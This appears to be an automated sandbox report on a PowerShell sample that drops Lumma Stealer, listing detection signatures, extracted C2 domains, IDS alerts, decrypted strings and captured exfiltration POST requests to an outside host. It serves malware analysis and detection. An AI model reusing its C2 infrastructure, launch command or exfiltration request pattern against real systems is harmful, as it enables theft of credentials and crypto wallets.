Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
176.113.115.170.ps1

Overview

General Information

Sample name:176.113.115.170.ps1
Analysis ID:1589406
MD5:88520295d17f287fd127830bb766712a
SHA1:df16145f1bff600147977f6acd4f931f204bf554
SHA256:3e376b0722ed209898a1b3a93a6988c4ad2f6e35083c07dc9e486e3da55c88ed
Tags:176-113-115-170bookingps1user-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nuttyshopr.biz", "spookycappy.biz", "marketlumpe.biz", "punishzement.biz", "grandiouseziu.biz", "fraggielek.biz", "truculengisau.biz", "littlenotii.biz"], "Build id": "atxOT1--noviy2"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 7696, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 7696, ProcessName: powershell.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:02.022134+010020283713Unknown Traffic192.168.2.449730104.102.49.254443TCP
        2025-01-12T09:13:03.168945+010020283713Unknown Traffic192.168.2.449731172.67.160.193443TCP
        2025-01-12T09:13:04.150232+010020283713Unknown Traffic192.168.2.449732172.67.160.193443TCP
        2025-01-12T09:13:05.241985+010020283713Unknown Traffic192.168.2.449733172.67.160.193443TCP
        2025-01-12T09:13:06.684051+010020283713Unknown Traffic192.168.2.449734172.67.160.193443TCP
        2025-01-12T09:13:07.827144+010020283713Unknown Traffic192.168.2.449735172.67.160.193443TCP
        2025-01-12T09:13:09.588549+010020283713Unknown Traffic192.168.2.449736172.67.160.193443TCP
        2025-01-12T09:13:10.764737+010020283713Unknown Traffic192.168.2.449737172.67.160.193443TCP
        2025-01-12T09:13:13.854856+010020283713Unknown Traffic192.168.2.449738172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:03.645814+010020546531A Network Trojan was detected192.168.2.449731172.67.160.193443TCP
        2025-01-12T09:13:04.600731+010020546531A Network Trojan was detected192.168.2.449732172.67.160.193443TCP
        2025-01-12T09:13:14.615899+010020546531A Network Trojan was detected192.168.2.449738172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:03.645814+010020498361A Network Trojan was detected192.168.2.449731172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:04.600731+010020498121A Network Trojan was detected192.168.2.449732172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:07.273263+010020480941Malware Command and Control Activity Detected192.168.2.449734172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:10.768561+010028438641A Network Trojan was detected192.168.2.449737172.67.160.193443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-12T09:13:02.570846+010028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: grandiouseziu.bizAvira URL Cloud: Label: malware
        Source: nuttyshopr.bizAvira URL Cloud: Label: malware
        Source: spookycappy.bizAvira URL Cloud: Label: malware
        Source: https://littlenotii.biz:443/apiznAvira URL Cloud: Label: malware
        Source: truculengisau.bizAvira URL Cloud: Label: malware
        Source: littlenotii.bizAvira URL Cloud: Label: malware
        Source: marketlumpe.bizAvira URL Cloud: Label: malware
        Source: fraggielek.bizAvira URL Cloud: Label: malware
        Source: punishzement.bizAvira URL Cloud: Label: malware
        Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["nuttyshopr.biz", "spookycappy.biz", "marketlumpe.biz", "punishzement.biz", "grandiouseziu.biz", "fraggielek.biz", "truculengisau.biz", "littlenotii.biz"], "Build id": "atxOT1--noviy2"}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: truculengisau.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: spookycappy.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: punishzement.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nuttyshopr.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: marketlumpe.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: littlenotii.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grandiouseziu.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fraggielek.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grandiouseziu.biz
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: atxOT1--noviy2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182C0 CryptUnprotectData,2_2_004182C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00415D15 CryptUnprotectData,2_2_00415D15
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418404 CryptUnprotectData,2_2_00418404
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.160.193:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1694669351.0000022416230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022416663000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]2_2_00427A50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]2_2_0040BA29
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h2_2_0040CB44
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042D420
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423E44
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx2_2_00408740
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h2_2_00429871
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0042E002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0042E002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax2_2_0042A810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax2_2_004288BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [edx]2_2_00402940
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]2_2_0040A910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_004161DF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]2_2_004251E8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push dword ptr [esp+28h]2_2_00426A00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00438AF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0041AA90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [esi], cx2_2_0041AA90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]2_2_004082A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]2_2_0043EB00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax2_2_00420B10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax2_2_00440310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]2_2_004273A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]2_2_004273A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]2_2_004273A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041DC40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]2_2_00417451
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407400
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407400
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h2_2_0043C410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi2_2_0043C410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_00415C25
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042B430
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add ebp, edi2_2_00408CD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx2_2_00426D70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], cl2_2_0042DD30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]2_2_0042E5C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_004165EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]2_2_00415590
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx2_2_004095A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax2_2_00415E42
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00413E50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_0040DE72
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]2_2_00425E00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]2_2_00425E00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_0043EE10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00408EB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041DEB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]2_2_0041F710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]2_2_0041F710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh2_2_004427E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042E7EB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h2_2_0040DFEA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042F799
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042DFAF

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49737 -> 172.67.160.193:443
        Source: Malware configuration extractorURLs: nuttyshopr.biz
        Source: Malware configuration extractorURLs: spookycappy.biz
        Source: Malware configuration extractorURLs: marketlumpe.biz
        Source: Malware configuration extractorURLs: punishzement.biz
        Source: Malware configuration extractorURLs: grandiouseziu.biz
        Source: Malware configuration extractorURLs: fraggielek.biz
        Source: Malware configuration extractorURLs: truculengisau.biz
        Source: Malware configuration extractorURLs: littlenotii.biz
        Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.160.193:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.160.193:443
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0UN82NW8QTG35EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18140Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1SLZZCJ0YA40I2WE5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LJRTKWFWEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0TUEDHOX16N7XANBGLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1409Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4N82PGCOPHNZDQKM4WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587052Host: misha-lomonosov.com
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: misha-lomonosov.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: grandiouseziu.biz
        Source: global trafficDNS traffic detected: DNS query: fraggielek.biz
        Source: global trafficDNS traffic detected: DNS query: littlenotii.biz
        Source: global trafficDNS traffic detected: DNS query: marketlumpe.biz
        Source: global trafficDNS traffic detected: DNS query: nuttyshopr.biz
        Source: global trafficDNS traffic detected: DNS query: punishzement.biz
